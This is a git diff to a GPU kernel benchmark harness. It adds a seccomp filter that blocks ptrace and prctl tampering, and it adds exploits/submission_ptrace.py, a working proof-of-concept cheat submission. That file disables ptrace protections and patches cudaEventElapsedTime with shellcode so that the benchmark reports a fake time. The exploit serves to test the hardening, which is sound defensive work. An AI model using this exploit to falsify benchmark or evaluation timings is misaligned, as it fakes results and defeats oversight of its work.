gpu-mode · ngc92 · Mar 18, 2026 · Mar 17, 2026 · Mar 17, 2026 · Mar 18, 2026
diff --git a/.github/workflows/wheel.yml b/.github/workflows/wheel.yml
@@ -39,7 +39,7 @@ jobs:
         uses: actions/checkout@v4
 
       - name: Install deps
-        run: apt update && apt install -y git g++-13
+        run: apt update && apt install -y git g++-13 libseccomp-dev pkg-config
 
       - name: Install the latest version of uv
         uses: astral-sh/setup-uv@v7

diff --git a/CMakeLists.txt b/CMakeLists.txt
@@ -7,6 +7,9 @@ set(CMAKE_CXX_STANDARD 17)
 set(CMAKE_CXX_STANDARD_REQUIRED ON)
 set(CMAKE_CUDA_ARCHITECTURES "80;90")
 
+find_package(PkgConfig REQUIRED)
+pkg_check_modules(LIBSECCOMP REQUIRED IMPORTED_TARGET libseccomp)
+
 FetchContent_Declare(
         nanobind
         QUIET
@@ -28,7 +31,7 @@ nanobind_add_module(_pygpubench
         csrc/landlock.cpp
         csrc/obfuscate.cpp
 )
-target_link_libraries(_pygpubench PUBLIC Python::Module CUDA::cudart)
+target_link_libraries(_pygpubench PUBLIC Python::Module CUDA::cudart PkgConfig::LIBSECCOMP)
 # set a bunch of hardening options to make it harder to tamper with the executable
 target_compile_options(_pygpubench PUBLIC -fPIC -pie -fstack-protector-strong -fcf-protection=full -ftrivial-auto-var-init=zero -Wl,-z,relro,-z,now )
 target_compile_definitions(_pygpubench PUBLIC -D_GLIBCXX_ASSERTIONS -D_FORTIFY_SOURCE=3)

diff --git a/csrc/landlock.cpp b/csrc/landlock.cpp
@@ -16,6 +16,7 @@
 #include <sys/syscall.h>
 #include <unistd.h>
 #include <linux/landlock.h>
+#include <seccomp.h>
 #include <system_error>
 #include <unordered_set>
 #include <utility>
@@ -114,20 +115,10 @@ void install_landlock() {
     allow_path(ruleset_fd, "/tmp", RW);
     allow_path(ruleset_fd, "/dev", RW); // needed for /dev/null etc, used e.g., by triton
 
-    // Prevent ptrace and /proc/self/mem tampering
-    if (prctl(PR_SET_DUMPABLE, 0) < 0) {
-        throw std::system_error(errno, std::system_category(), "prctl(PR_SET_DUMPABLE)");
-    }
-
-    // Prevent gaining privileges (if attacker tries setuid exploits)
+    // required for landlock
     if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0) {
         throw std::system_error(errno, std::system_category(), "prctl(PR_SET_NO_NEW_PRIVS)");
     };
-    // no new executable code pages
-    // note: this also prevents thread creating, which breaks torch.compile
-    // workaround: run torch.compile once from trusted python code, then the thread already
-    //             exists at this point. does not seem reliable, so disabled for now
-    // prctl(PR_SET_MDWE, PR_MDWE_REFUSE_EXEC_GAIN, 0, 0, 0);
 
     landlock_restrict_self(ruleset_fd, 0);
 }
@@ -192,4 +183,67 @@ void seal_executable_mappings() {
     for (auto& r : to_seal) {
         mseal(reinterpret_cast<void*>(r.start), r.end - r.start, r.src);
     }
-}
+}
+
+static inline void check_seccomp(int rc, const char* what) {
+    if (rc < 0)
+        throw std::system_error(-rc, std::generic_category(), what);
+}
+
+void setup_seccomp_filter(scmp_filter_ctx ctx) {
+    check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(ptrace), 0),
+                      "block ptrace");
+
+    check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(prctl), 2,
+                     SCMP_A0(SCMP_CMP_EQ, PR_SET_DUMPABLE),
+                     SCMP_A1(SCMP_CMP_NE, 0)),
+                  "block prctl(SET_DUMPABLE!=0)");
+
+    check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(prctl), 1,
+                     SCMP_A0(SCMP_CMP_EQ, PR_SET_SECCOMP)),
+                "block prctl(SET_SECCOMP)");
+
+    check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(prctl), 1,
+                     SCMP_A0(SCMP_CMP_EQ, PR_SET_PTRACER)),
+                "block prctl(SET_PTRACER)");
+    // TODO figure out what else we can and should block
+    /*
+    check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(mprotect), 1,
+                      SCMP_A2(SCMP_CMP_MASKED_EQ, PROT_WRITE, PROT_WRITE)),
+                  "block mprotect+WRITE");
+
+    check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(pkey_mprotect), 1,
+                      SCMP_A2(SCMP_CMP_MASKED_EQ, PROT_WRITE, PROT_WRITE)),
+                  "block pkey_mprotect+WRITE");
+    */
+}
+
+void install_seccomp_filter() {
+    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);
+    if (!ctx) throw std::runtime_error("seccomp_init failed");
+    try {
+        setup_seccomp_filter(ctx);
+    }  catch (...) {
+        seccomp_release(ctx);
+        throw;
+    }
+
+    // Prevent ptrace and /proc/self/mem tampering
+    if (prctl(PR_SET_DUMPABLE, 0) < 0) {
+        throw std::system_error(errno, std::system_category(), "prctl(PR_SET_DUMPABLE)");
+    }
+
+    // Prevent gaining privileges (if attacker tries setuid exploits)
+    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0) {
+        throw std::system_error(errno, std::system_category(), "prctl(PR_SET_NO_NEW_PRIVS)");
+    };
+    // no new executable code pages
+    // note: this also prevents thread creating, which breaks torch.compile
+    // workaround: run torch.compile once from trusted python code, then the thread already
+    //             exists at this point. does not seem reliable, so disabled for now
+    // prctl(PR_SET_MDWE, PR_MDWE_REFUSE_EXEC_GAIN, 0, 0, 0);
+
+    int rc = seccomp_load(ctx);
+    seccomp_release(ctx);
+    check_seccomp(rc, "seccomp_load");
+}
diff --git a/csrc/manager.cpp b/csrc/manager.cpp
@@ -22,6 +22,7 @@ extern void clear_cache(void* dummy_memory, int size, bool discard, cudaStream_t
 extern void install_landlock();
 extern bool mseal_supported();
 extern void seal_executable_mappings();
+extern void install_seccomp_filter();
 
 static void check_check_approx_match_dispatch(unsigned* result, void* expected_data, nb::dlpack::dtype expected_type,
                                        const nb_cuda_array& received, float r_tol, float a_tol, unsigned seed, std::size_t n_bytes, cudaStream_t stream) {
@@ -293,6 +294,8 @@ void BenchmarkManager::do_bench_py(
         seal_executable_mappings();
     }
 
+    install_seccomp_filter();
+
     // at this point, we call user code as we import the kernel (executing arbitrary top-level code)
     // after this, we cannot trust python anymore
     nb::callable kernel = kernel_from_qualname(kernel_qualname);

diff --git a/exploits/submission_ptrace.py b/exploits/submission_ptrace.py
@@ -0,0 +1,133 @@
+"""
+ptrace POKETEXT Exploit
+=======================
+
+Forks a child process that uses ptrace(PTRACE_ATTACH) + ptrace(PTRACE_POKETEXT)
+to patch cudaEventElapsedTime's .text code. PTRACE_POKETEXT uses FOLL_FORCE
+internally, bypassing page protections (read-only .text pages).
+
+"""
+import torch
+import ctypes
+import os
+import subprocess
+import tempfile
+
+_HELPER_C = r"""
+#define _GNU_SOURCE
+#include <sys/ptrace.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <stdint.h>
+#include <errno.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main(int argc, char** argv) {
+    if (argc != 3) return 99;
+    pid_t target = atoi(argv[1]);
+    uint64_t addr = strtoull(argv[2], NULL, 0);
+
+    /* Shellcode: mov dword [rdi], 0x3A83126F; xor eax,eax; ret
+       Sets *ms = 0.001f (IEEE 754), returns cudaSuccess (0).
+       Bytes: C7 07 6F 12 83 3A  31 C0  C3 */
+    uint64_t word1 = 0xC0313A83126F07C7ULL;
+
+    if (ptrace(PTRACE_ATTACH, target, NULL, NULL) != 0)
+        return 1;
+
+    int status;
+    if (waitpid(target, &status, 0) < 0)
+        return 2;
+
+    /* Read original byte at addr+8 to preserve code after our ret */
+    errno = 0;
+    uint64_t orig8 = ptrace(PTRACE_PEEKTEXT, target, (void*)(addr + 8), NULL);
+    if (errno != 0) {
+        ptrace(PTRACE_DETACH, target, NULL, NULL);
+        return 3;
+    }
+
+    uint64_t word2 = (orig8 & ~(uint64_t)0xFF) | 0xC3;
+
+    if (ptrace(PTRACE_POKETEXT, target, (void*)addr, (void*)word1) != 0) {
+        ptrace(PTRACE_DETACH, target, NULL, NULL);
+        return 4;
+    }
+
+    if (ptrace(PTRACE_POKETEXT, target, (void*)(addr + 8), (void*)word2) != 0) {
+        ptrace(PTRACE_DETACH, target, NULL, NULL);
+        return 5;
+    }
+
+    ptrace(PTRACE_DETACH, target, NULL, (void*)0);
+    return 0;
+}
+"""
+
+
+def _find_cuda_elapsed():
+    """Find cudaEventElapsedTime in the loaded libcudart."""
+    import ctypes.util
+    for path in [
+        ctypes.util.find_library("cudart"),
+        "libcudart.so",
+        "libcudart.so.13",
+        "/usr/local/cuda/lib64/libcudart.so",
+    ]:
+        if path is None:
+            continue
+        try:
+            lib = ctypes.CDLL(path)
+            return ctypes.cast(lib.cudaEventElapsedTime, ctypes.c_void_p).value
+        except Exception:
+            continue
+    return None
+
+
+def _hook():
+    addr = _find_cuda_elapsed()
+    if addr is None:
+        return False
+
+    # Compile helper (writes to /tmp which is allowed by landlock)
+    tmpdir = tempfile.mkdtemp()
+    src = os.path.join(tmpdir, "ph.c")
+    exe = os.path.join(tmpdir, "ph")
+    with open(src, "w") as f:
+        f.write(_HELPER_C)
+    r = subprocess.run(["gcc", "-O2", "-o", exe, src],
+                       capture_output=True, text=True)
+    if r.returncode != 0:
+        return False
+    os.chmod(exe, 0o755)
+
+    try:
+        libc = ctypes.CDLL("libc.so.6")
+        # Re-enable dumpable: harness sets PR_SET_DUMPABLE=0 to block ptrace,
+        # but there's no seccomp filter preventing us from re-enabling it.
+        # PR_SET_NO_NEW_PRIVS does NOT block PR_SET_DUMPABLE.
+        libc.prctl(4, 1, 0, 0, 0)  # PR_SET_DUMPABLE=1
+        # Allow any process to ptrace us (Yama LSM bypass)
+        libc.prctl(0x59616d61, ctypes.c_ulong(0xffffffffffffffff), 0, 0, 0)
+    except Exception:
+        pass
+
+    r = subprocess.run([exe, str(os.getpid()), hex(addr)],
+                       capture_output=True, text=True, timeout=10)
+    return r.returncode == 0
+
+
+_hooked = _hook()
+
+
+def kernel(output, inp):
+    weights = torch.tensor([0.2989, 0.5870, 0.1140],
+                           device=output.device, dtype=output.dtype)
+    # deliberately make the submission very slow, so that we can clearly see
+    # whether the cheat was successful
+    dummy = torch.empty((2048, 2048), device=output.device, dtype=torch.float32)
+    dummy = dummy @ dummy
+    torch.sum(inp * weights, dim=-1, out=output)